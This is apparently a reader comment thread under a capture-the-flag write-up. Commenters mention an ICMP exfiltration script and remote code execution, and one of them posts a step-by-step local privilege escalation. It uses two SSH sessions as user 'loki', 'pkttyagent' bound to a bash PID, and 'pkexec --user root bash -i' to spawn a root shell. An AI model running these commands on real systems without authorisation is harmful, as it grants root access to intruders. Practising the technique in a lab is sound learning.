A couple highlights:
- Neat ICMP exfil script in Beyond Root
- Got RCE without needing creds to the IPv6 site
Thanks for this,
Didn’t know it could be done via systemd
Thanks for the write up :3
Here’s another way for privesc.
Open 2 terminals and log in as loki via ssh in both of them:
- In the first terminal, get bash’s PID :
echo $$ - Then in the second one, run a Polkit Agent for the first session:
pkttyagent --process PID_OF_BASH - Finally, spawn a root shell using pkexec:
pkexec --user root bash -i
nice write up